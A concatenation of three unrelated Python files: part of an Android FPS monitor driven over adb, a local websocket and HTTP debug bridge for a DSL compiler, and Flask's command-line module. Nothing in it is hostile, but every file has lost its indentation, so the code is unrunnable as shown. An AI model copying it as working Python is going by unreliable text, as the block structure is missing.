# Since we only care about completed frames, we will ignore any timestamps
# with this value.
for line in results[1:]:
fields = line.split()
if len(fields) != 3:
continue
timestamp = [int(fields[0]),int(fields[1]),int(fields[2])]
if timestamp[1] == pending_fence_timestamp:
continue
timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
timestamps.append(timestamp)
return (refresh_period, timestamps)
def _get_surface_stats_legacy(self):
"""Legacy method (before JellyBean), returns the current Surface index
and timestamp.
Calculate FPS by measuring the difference of Surface index returned by
SurfaceFlinger in a period of time.
Returns:
Dict of {page_flip_count (or 0 if there was an error), timestamp}.
"""
cur_surface = None
timestamp = datetime.datetime.now()
# 这个命令可能需要root
ret = self.device.adb.run_shell_cmd("service call SurfaceFlinger 1013")
if not ret :
return None
match = re.search('^Result: Parcel\((\w+)', ret)
if match :
cur_surface = int(match.group(1), 16)
return {'page_flip_count': cur_surface,'timestamp': timestamp}
return None
class FPSMonitor(Monitor):
'''FPS监控器'''
def __init__(self, device_id, package_name = None,frequency=1.0,timeout =24 * 60 * 60,fps_queue=None,jank_threshold=166, use_legacy = False):
'''构造器
:param str device_id: 设备id
:param float frequency: 帧率统计频率,默认1秒
:param int jank_threshold: 计算jank值的阈值,单位毫秒,默认10个时钟周期,166ms
:param bool use_legacy: 当指定该参数为True时总是使用page_flip统计帧率,此时反映的是全屏内容的刷新帧率。
当不指定该参数时,对4.1以上的系统将统计当前获得焦点的Activity的刷新帧率
'''
self.use_legacy = use_legacy
self.frequency = frequency # 取样频率
self.jank_threshold = jank_threshold
self.device = AndroidDevice(device_id)
self.timeout = timeout
if not package_name:
package_name = self.device.adb.get_foreground_process()
self.package = package_name
self.fpscollector = SurfaceStatsCollector(self.device, self.frequency, package_name,fps_queue,self.jank_threshold, self.use_legacy)
def start(self,start_time):
'''启动FPSMonitor日志监控器
'''
if not RuntimeData.package_save_path:
RuntimeData.package_save_path = os.path.join(os.path.abspath(os.path.join(os.getcwd(), "../..")),'results', self.package, start_time)
if not os.path.exists(RuntimeData.package_save_path):
os.makedirs(RuntimeData.package_save_path)
self.start_time = start_time
self.fpscollector.start(start_time)
logger.debug('FPS monitor has start!')
def stop(self):
'''结束FPSMonitor日志监控器
'''
self.fpscollector.stop()
logger.debug('FPS monitor has stop!')
def save(self):
pass
def parse(self, file_path):
'''解析
:param str file_path: 要解析数据文件的路径
'''
pass
def get_fps_collector(self):
'''获得fps收集器,收集器里保存着time fps jank的列表
:return: fps收集器
:rtype: SurfaceStatsCollector
'''
return self.fpscollector
if __name__ == '__main__':
# tulanduo android8.0 api level 27
monitor = FPSMonitor('TC79SSDMO7HEY5Z9',"com.alibaba.ailabs.genie.smartapp",1)
# mate 9 android8.0
# monitor = FPSMonitor('MKJNW18226007860',"com.sankuai.meituan",2)
# android8.0 Google Pixel 2
# monitor = FPSMonitor('HT7B81A05143',package_name = "com.alibaba.ailibs.genie.contacts",1)
monitor.start(TimeUtils.getCurrentTimeUnderline())
time.sleep(600)
monitor.stop()
|
debug_bridge.py
|
import os
import time
import base64
import datetime
import types
import websockets
import threading
from queue import Queue
import http.server
from jinja2 import Template
from base64 import b64encode
import asyncio
import qrcode
import qrcode.image
import json
import netifaces
import logging
import subprocess
try:
import importlib.resources as pkg_resources
except ImportError:
import importlib_resources as pkg_resources
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler, FileSystemEvent
from common import RawInput, CompileResult
def get_v4_ip():
try:
iface = netifaces.ifaddresses('eth0')
except ValueError:
iface = netifaces.ifaddresses('en0')
if iface is None:
raise Exception('获取IP错误')
return iface[netifaces.AF_INET][0]['addr']
def get_ip():
return get_v4_ip()
def _get_dir_name_on_path(path: str) -> str:
"""通过路径获取文件夹名"""
prefix = path.split('/')
if len(prefix) == 1:
return '.'
else:
return '/'.join(prefix[:-1])
def _get_file_name_on_path(path: str) -> str:
"""通过路径获取文件名"""
return path.split('/')[-1]
class _DslFileChangeListener(FileSystemEventHandler):
def __init__(self, dsl_file_name, callback_function) -> None:
super().__init__()
self.file_name = dsl_file_name
self.callback = callback_function
assert type(callback_function) is types.MethodType
def on_modified(self, event: FileSystemEvent):
if not event.is_directory:
# 是file
if _get_file_name_on_path(event.src_path) == self.file_name:
# 修改的就是传入的dsl文件,那么callback
self.callback()
class _WsResponse:
TYPE_COMPILED = 'compiled'
TYPE_MSG = 'msg'
TYPE_EXT_CMD = 'ext'
code: int
data: str
def __init__(self, code, data, rtype: str) -> None:
super().__init__()
self.code = code
self.data = data
self.rtype = rtype
def to_json(self):
return json.dumps({
'code': self.code,
'type': self.rtype,
'data': self.data
})
class _DebugServer(threading.Thread):
_first_time = True
_http_server = None
_ws_server = None
def __init__(self, q: Queue) -> None:
super().__init__()
self.q = q
self.wss_qr = None
self.wss_addr = None
def run(self):
while True:
logging.debug('Wait for next msg...')
new_result = self.q.get()
logging.debug(f'Got msg! ->>>>>>> {new_result}')
if type(new_result) is CompileResult:
if self._first_time:
self._first_time = False
self._real_run(new_result)
else:
self._http_server.shutdown()
self._http_server.thread.join()
self._publish_local_http(new_result, self.wss_qr, self.wss_addr, True)
self._update_wss(new_result)
if new_result == 'quit':
# 退出,关闭端口服务,避免异常退出导致的端口占用
if self._http_server:
self._http_server.shutdown()
self._http_server.thread.join()
logging.debug('http server 已关闭')
if self._ws_server:
self._ws_server.shutdown()
logging.debug('websocket server 已关闭')
break
def _update_wss(self, new_result):
self._ws_server.broadcast_new_data(new_result)
def _real_run(self, result):
self._publish_wss(result)
self._publish_local_http(result, self.wss_qr, self.wss_addr)
def _publish_wss(self, result):
"""发布一个wss,用于广播编译数据,一个新的client连接后将会收到当前最新的编译数据
一个编译数据更新后,所有的client也能及时获取到最新的编译数据"""
port = 8891
tmp_png_file = 'tmp_qr.png'
ws_address = f'ws://{get_ip()}:{port}'
qrcode.make(ws_address).save(tmp_png_file)
class WsServer:
thread = None
clients = {}
server = None
latest_result = None
async def _broadcast_new_data(self):
for client in self.clients.values():
await self._send_compiled_string(client)
def broadcast_new_data(self, new_result):
self.latest_result = new_result
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(self._broadcast_new_data())
def run(self) -> None:
async def handle_client(websocket, path):
try:
client_id = websocket.remote_address
if client_id not in self.clients.keys():
self.clients[client_id] = websocket
# 1.st 告诉最新的数据
logging.debug(f'new client connected! -->>> {client_id}')
await self._send_compiled_string(websocket)
# 2.nd 听客户端想要什么
while True:
logging.debug(f'listen for client -->>> {client_id}')
msg = await websocket.recv()
logging.debug(f"< {msg}")
if msg == 'ask':
# 接受ask命令,然后会告诉新数据
logging.debug('client ask the latest data')
await self._send_compiled_string(websocket)
if str(msg).startswith('ext:'):
logging.debug('client want set new ext to the mobile')
await self._do_ext_command(str(msg)[4:])
else:
logging.warning('un-supported command come in, check it')
resp = _WsResponse(-1, 'not support command', _WsResponse.TYPE_MSG)
await websocket.send(resp.to_json())
except websockets.ConnectionClosedError:
del self.clients[client_id]
logging.debug(f'connection lose <<< {client_id}')
except websockets.ConnectionClosedOK:
del self.clients[client_id]
logging.debug(f'connection closed <<< {client_id}')
self.latest_result = result
new_loop = asyncio.new_event_loop()
asyncio.set_event_loop(new_loop)
logging.getLogger('asyncio').setLevel(logging.ERROR)
logging.getLogger('asyncio.coroutines').setLevel(logging.ERROR)
logging.getLogger('websockets.server').setLevel(logging.ERROR)
logging.getLogger('websockets.protocol').setLevel(logging.ERROR)
self.server = websockets.serve(handle_client, get_ip(), port)
logging.debug(f'publish local ws service on -->>> {ws_address}')
asyncio.get_event_loop().run_until_complete(self.server)
asyncio.get_event_loop().run_forever()
def shutdown(self):
self.server.ws_server.close()
async def _send_compiled_string(self, client):
logging.debug('tell client latest compiled string ...')
resp = _WsResponse(0, self.latest_result.compiled_str, _WsResponse.TYPE_COMPILED)
await client.send(f"{resp.to_json()}")
logging.debug('tell client latest compiled string --->>> DONE')
async def _do_ext_command(self, ext: str):
logging.debug('send new ext data to client ...')
resp = _WsResponse(0, ext, _WsResponse.TYPE_EXT_CMD)
clts = self.clients.values()
if len(clts) > 0:
for c in clts:
await c.send(f'{resp.to_json()}')
logging.debug('send new ext data to client --->>> DONE')
self._ws_server = WsServer()
self._ws_server.thread = threading.Thread(None, self._ws_server.run)
self._ws_server.thread.start()
with open(tmp_png_file, 'rb') as image_file:
encoded_string = str(base64.b64encode(image_file.read()), encoding='utf-8')
os.remove(tmp_png_file)
self.wss_qr = encoded_string
self.wss_addr = ws_address
def _publish_local_http(self, result: CompileResult, qr_64: str, wss_addr: str, update=False):
"""发布一个本地http server用来发布提供编译信息的html"""
now = datetime.datetime.now()
now_string = now.strftime('%Y-%m-%d %H:%M:%S.%f')
class _HttpHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
# {{ 变量 }}
# {% 语句 %}
template_string = pkg_resources.read_text('res', 'debug_info.html.jinja2')
template = Template(template_string)
self.wfile.write(bytes(template.render(cstr=result.compiled_str,
cjson=b64encode(bytes(result.raw_json, encoding='utf-8')).decode(
'utf-8'),
now_time=now_string,
wss=wss_addr,
img_64=qr_64,
md5=result.meta_info.json_md5,
cli_ver=result.meta_info.cli_ver,
runtime_ver=result.meta_info.runtime_ver), encoding='utf-8'))
class _HttpServer(http.server.HTTPServer):
thread = None
def __init__(self):
server_address = ('', 8000)
super().__init__(server_address, _HttpHandler)
def run(self):
try:
url = f'http://{get_ip()}:{str(self.server_port)}'
logging.debug(f'本地调试信息已发布: {url}')
if update is False:
t = threading.Thread(target=self.delay_open_url, args=(url,))
t.daemon = True
t.start()
self.serve_forever()
finally:
logging.debug('本地调试服务停止')
self.server_close()
@staticmethod
def delay_open_url(url):
time.sleep(2)
logging.debug('try open web page')
subprocess.Popen(['open', url])
self._http_server = _HttpServer()
self._http_server.thread = threading.Thread(None, self._http_server.run)
self._http_server.thread.start()
class DebugBridge:
raw_input: RawInput
dog = None
dbserver = None
def __init__(self, raw: RawInput) -> None:
self.raw_input = raw
self.queue = Queue(2)
def update(self, result: CompileResult):
self.queue.put(result)
def _on_dsl_change(self):
logging.debug('changed')
from compiler import CompileTask
c = CompileTask(self.raw_input, self)
try:
c.compile()
except Exception as e:
logging.error(f'ERROR >>> 编译错误,请检查\n{e}')
def _monitor_file(self):
event_handler = _DslFileChangeListener(_get_file_name_on_path(self.raw_input.src_file), self._on_dsl_change)
self.dog = Observer()
self.dog.schedule(event_handler, _get_dir_name_on_path(self.raw_input.src_file), recursive=False)
self.dog.start()
def _open_bridge(self):
self._monitor_file()
self.dbserver = _DebugServer(self.queue)
self.dbserver.daemon = True
self.dbserver.start()
def run(self, result: CompileResult):
self.queue.put(result)
self._open_bridge()
logging.debug('输入q回车停止调试')
while True:
try:
user_input = input()
if str(user_input).lower() == 'q':
self.dog.stop()
self.queue.put('quit')
time.sleep(1)
exit(2)
except InterruptedError or KeyboardInterrupt:
exit(3)
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from __future__ import print_function
import ast
import inspect
import os
import re
import ssl
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock, Thread
import click
from werkzeug.utils import import_string
from . import __version__
from ._compat import getargspec, iteritems, reraise, text_type
from .globals import current_app
from .helpers import get_debug_flag, get_env, get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for k, v in iteritems(module.__dict__) if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
'Detected multiple Flask applications in module "{module}". Use '
'"FLASK_APP={module}:name" to specify the correct '
"one.".format(module=module.__name__)
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
'Detected factory "{factory}" in module "{module}", but '
"could not call it without arguments. Use "
"\"FLASK_APP='{module}:{factory}(args)'\" to specify "
"arguments.".format(factory=attr_name, module=module.__name__)
)
raise NoAppException(
'Failed to find Flask application or factory in module "{module}". '
'Use "FLASK_APP={module}:name to specify one.'.format(module=module.__name__)
)
def call_factory(script_info, app_factory, arguments=()):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
args_spec = getargspec(app_factory)
arg_names = args_spec.args
arg_defaults = args_spec.defaults
if "script_info" in arg_names:
return app_factory(*arguments, script_info=script_info)
elif arguments:
return app_factory(*arguments)
elif not arguments and len(arg_names) == 1 and arg_defaults is None:
return app_factory(script_info)
return app_factory()
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
del tb
def find_app_by_string(script_info, module, app_name):
"""Checks if the given string is a variable name or a function. If it is a
function, it checks for specified arguments and whether it takes a
``script_info`` argument and calls the function with the appropriate
arguments.
"""
from flask import Flask
match = re.match(r"^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$", app_name)
if not match:
raise NoAppException(
'"{name}" is not a valid variable name or function '
"expression.".format(name=app_name)
)
name, args = match.groups()
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(e.args[0])
if inspect.isfunction(attr):
if args:
try:
args = ast.literal_eval("({args},)".format(args=args))
except (ValueError, SyntaxError) as e:
raise NoAppException(
"Could not parse the arguments in "
'"{app_name}".'.format(e=e, app_name=app_name)
)
else:
args = ()
try:
app = call_factory(script_info, attr, args)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
'{e}\nThe factory "{app_name}" in module "{module}" could not '
"be called with the specified arguments.".format(
e=e, app_name=app_name, module=module.__name__
)
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from "
'"{module}:{app_name}".'.format(module=module.__name__, app_name=app_name)
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
if os.path.splitext(path)[1] == ".py":
path = os.path.splitext(path)[0]
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise NoAppException(
'While importing "{name}", an ImportError was raised:'
"\n\n{tb}".format(name=module_name, tb=traceback.format_exc())
)
elif raise_if_not_found:
raise NoAppException('Could not import "{name}".'.format(name=module_name))
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
message = "Flask %(version)s\nPython %(python_version)s"
click.echo(
message % {"version": __version__, "python_version": sys.version},
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo(object):
"""Help object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
app = None
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (self.app_import_path.split(":", 1) + [None])[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
debug = get_debug_flag()
# Update the app's debug flag through the descriptor so that other
# values repopulate as well.
if debug is not None:
app.debug = debug
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
For information as of why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands wil be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
**extra
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(create_app=self.create_app)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super(FlaskGroup, self).main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.exists(".env") or os.path.exists(".flaskenv"):
click.secho(
" * Tip: There are .env files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
)
return
if path is not None:
return dotenv.load_dotenv(path)
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = ' * Serving Flask app "{0}"'.format(app_import_path)
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(" * Environment: {0}".format(env))
if env == "production":
click.secho(
" WARNING: Do not use the development server in a production"
" environment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(" * Debug mode: {0}".format("on" if debug else "off"))
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import OpenSSL
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires pyOpenSSL.", ctx, param
)
return value
obj = import_string(value, silent=True)
if sys.version_info < (2, 7):
if obj:
return obj
else:
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
if sys.version_info < (2, 7):
is_context = cert and not isinstance(cert, (text_type, bytes))
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
@click.command("run", short_help="Runs a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loader",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading, with_threads, cert):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
if eager_loading is None:
eager_loading = not reload
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
)
@click.command("shell", short_help="Runs a shell in the app context.")
@with_appcontext
def shell_command():
"""Runs an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to it's configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = "Python %s on %s\nApp: %s [%s]\nInstance: %s" % (
sys.version,
sys.platform,
app.import_name,
app.env,
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup, "r") as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [", ".join(sorted(rule.methods - ignored_methods)) for rule in rules]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main(as_module=False):
args = sys.argv[1:]
if as_module:
this_module = "flask"
if sys.version_info < (2, 7):
this_module += ".cli"
name = "python -m " + this_module
# Python rewrites "python -m flask" to the path to the file in argv.
# Restore the original command so that the reloader works.
sys.argv = ["-m", this_module] + args
